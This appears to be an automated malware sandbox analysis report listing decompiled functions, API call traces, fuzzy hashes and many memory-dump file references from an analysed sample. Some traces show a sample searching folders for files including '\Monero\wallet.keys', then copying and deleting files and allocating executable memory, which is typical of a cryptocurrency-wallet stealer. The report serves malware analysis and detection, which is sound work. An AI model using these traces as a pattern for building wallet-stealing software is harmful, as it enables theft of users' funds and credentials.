Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 9534ec9eecfd052616a88b999da1e40c8793fea20c1c32dedff1cc61d1e56ae3
Instruction ID: 19ece770be8dd4782fa81b326ad2cd425fff0be240254120a99f79cf6fe06f3a
Opcode Fuzzy Hash: 9534ec9eecfd052616a88b999da1e40c8793fea20c1c32dedff1cc61d1e56ae3
Instruction Fuzzy Hash: 53F0F6B1A10208EBC700CF84DC45FAAF7BCF745714F00067AF50492280D3B469548BD5

Function 0025B4F0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

Part of subcall function 0026A9B0: lstrlen.KERNEL32(?,00D49078,?,\Monero\wallet.keys,00270E17), ref: 0026A9C5
Part of subcall function 0026A9B0: lstrcpy.KERNEL32(00000000), ref: 0026AA04
Part of subcall function 0026A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0026AA12

Part of subcall function 0026A920: lstrcpy.KERNEL32(00000000,?), ref: 0026A972
Part of subcall function 0026A920: lstrcat.KERNEL32(00000000), ref: 0026A982

Part of subcall function 0026A8A0: lstrcpy.KERNEL32(?,00270E17), ref: 0026A905

Part of subcall function 0026A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0026A7E6

lstrlen.KERNEL32(00000000), ref: 0025B9C2
lstrlen.KERNEL32(00000000), ref: 0025B9D6

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 84ea7033a0c4bec91759b6258ecc2a1859a67a5f090334e71be4db7aace1e652
Instruction ID: 434a5d1fa8543d0d69904de3a130d27ff80dfdf8069fd0dbf013895898a6abf4
Opcode Fuzzy Hash: 84ea7033a0c4bec91759b6258ecc2a1859a67a5f090334e71be4db7aace1e652
Instruction Fuzzy Hash: 10E1CC729301189BDB15EBA0CD92EEE7338AF64300F504169F50677091EF346AA9CFA6

Function 0025AEF0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

Part of subcall function 0026A9B0: lstrlen.KERNEL32(?,00D49078,?,\Monero\wallet.keys,00270E17), ref: 0026A9C5
Part of subcall function 0026A9B0: lstrcpy.KERNEL32(00000000), ref: 0026AA04
Part of subcall function 0026A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0026AA12

Part of subcall function 0026A920: lstrcpy.KERNEL32(00000000,?), ref: 0026A972
Part of subcall function 0026A920: lstrcat.KERNEL32(00000000), ref: 0026A982

Part of subcall function 0026A8A0: lstrcpy.KERNEL32(?,00270E17), ref: 0026A905

lstrlen.KERNEL32(00000000), ref: 0025B16A
lstrlen.KERNEL32(00000000), ref: 0025B17E

Part of subcall function 0026A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0026A7E6

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 07210612b810a990b9ce34310f4fcafeda22e3086d029e70fcdabe7e4e75b48b
Instruction ID: 31d3631b9073d0412bd80c7a0e6d33b86c1e5ff0988992bf80e8cbd886cb3897
Opcode Fuzzy Hash: 07210612b810a990b9ce34310f4fcafeda22e3086d029e70fcdabe7e4e75b48b
Instruction Fuzzy Hash: D791EE729301089BDB05EBA4DD96DEE7338AF54300F504269F507B7091EF346AA9CFA6

Function 0025B230 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

Part of subcall function 0026A9B0: lstrlen.KERNEL32(?,00D49078,?,\Monero\wallet.keys,00270E17), ref: 0026A9C5
Part of subcall function 0026A9B0: lstrcpy.KERNEL32(00000000), ref: 0026AA04
Part of subcall function 0026A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0026AA12

Part of subcall function 0026A920: lstrcpy.KERNEL32(00000000,?), ref: 0026A972
Part of subcall function 0026A920: lstrcat.KERNEL32(00000000), ref: 0026A982

Part of subcall function 0026A8A0: lstrcpy.KERNEL32(?,00270E17), ref: 0026A905

lstrlen.KERNEL32(00000000), ref: 0025B42E
lstrlen.KERNEL32(00000000), ref: 0025B442

Part of subcall function 0026A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0026A7E6

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: e2200f091c72664f68af64a3772f0470624f2ca6aaafa4214433c33bdd1fc7c5
Instruction ID: 0f43c9e166d0b15eb2a29807463149d660b8c115ebfd6a803ee78e75199c235c
Opcode Fuzzy Hash: e2200f091c72664f68af64a3772f0470624f2ca6aaafa4214433c33bdd1fc7c5
Instruction Fuzzy Hash: 74710A729301089BDB04FBA4DD96DEE7338AF54300F504569F506B7091EF346AA9CFA6

Function 00264BB0 Relevance: 2.6, APIs: 2, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00268DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00268E0B

lstrcat.KERNEL32(?,00000000), ref: 00264BEA
lstrcat.KERNEL32(?,00D4D660), ref: 00264C08

Part of subcall function 00264910: wsprintfA.USER32 ref: 0026492C
Part of subcall function 00264910: FindFirstFileA.KERNEL32(?,?), ref: 00264943

Part of subcall function 00264910: StrCmpCA.SHLWAPI(?,00270FDC), ref: 00264971
Part of subcall function 00264910: StrCmpCA.SHLWAPI(?,00270FE0), ref: 00264987
Part of subcall function 00264910: FindNextFileA.KERNEL32(000000FF,?), ref: 00264B7D
Part of subcall function 00264910: FindClose.KERNEL32(000000FF), ref: 00264B92

Part of subcall function 00264910: wsprintfA.USER32 ref: 002649B0
Part of subcall function 00264910: StrCmpCA.SHLWAPI(?,002708D2), ref: 002649C5
Part of subcall function 00264910: wsprintfA.USER32 ref: 002649E2
Part of subcall function 00264910: PathMatchSpecA.SHLWAPI(?,?), ref: 00264A1E
Part of subcall function 00264910: lstrcat.KERNEL32(?,00D4E948), ref: 00264A4A
Part of subcall function 00264910: lstrcat.KERNEL32(?,00270FF8), ref: 00264A5C
Part of subcall function 00264910: lstrcat.KERNEL32(?,?), ref: 00264A70
Part of subcall function 00264910: lstrcat.KERNEL32(?,00270FFC), ref: 00264A82
Part of subcall function 00264910: lstrcat.KERNEL32(?,?), ref: 00264A96
Part of subcall function 00264910: CopyFileA.KERNEL32(?,?,00000001), ref: 00264AAC
Part of subcall function 00264910: DeleteFileA.KERNEL32(?), ref: 00264B31

Part of subcall function 00264910: wsprintfA.USER32 ref: 00264A07

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: 8427b7d6b022e479c975c0a97d9684baca6b870a8deb524fbfdd071123624a2e
Instruction ID: 8369e2372cd927193ec47212b4244ddbb1cb111b5bb68080493d8a3087e5cebf
Opcode Fuzzy Hash: 8427b7d6b022e479c975c0a97d9684baca6b870a8deb524fbfdd071123624a2e
Instruction Fuzzy Hash: 8E41C3B6510104ABC754FBA0EC42EFE333CA799300F408669BA8957186ED715ABC8FD6

Function 00256660 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00256706
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00256753

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 631eec0c942443933b2042331a7027796dc7d0a0474f0bca06e28d90299a7046
Instruction ID: ed41e6e3378ef75446f3fddaa2d70a885367a888b36c02b2f8c75457ded5bf88
Opcode Fuzzy Hash: 631eec0c942443933b2042331a7027796dc7d0a0474f0bca06e28d90299a7046
Instruction Fuzzy Hash: 1F41FA74A10209EFCB44CF98C494BADBBB5FF48315F6482A9E8099B341C775EA95CF84

Function 00265050 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00268DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00268E0B

lstrcat.KERNEL32(?,00000000), ref: 0026508A
lstrcat.KERNEL32(?,00D4E518), ref: 002650A8

Part of subcall function 00264910: wsprintfA.USER32 ref: 0026492C
Part of subcall function 00264910: FindFirstFileA.KERNEL32(?,?), ref: 00264943

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: 777809a020f16ce8f257d6c184cae08b2b67de286bcefd99fa9690490a80390a
Instruction ID: 4f5ea86bd426e1391bffbfedad2f07cf89170ec1cc8a4d3a3c670fc773bd8008
Opcode Fuzzy Hash: 777809a020f16ce8f257d6c184cae08b2b67de286bcefd99fa9690490a80390a
Instruction Fuzzy Hash: D601967692020867CB54FB70DC47EEE733CAB64300F0046A5B68957191EE709AE88FE6

Function 002510A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 002510B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 002510F7

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
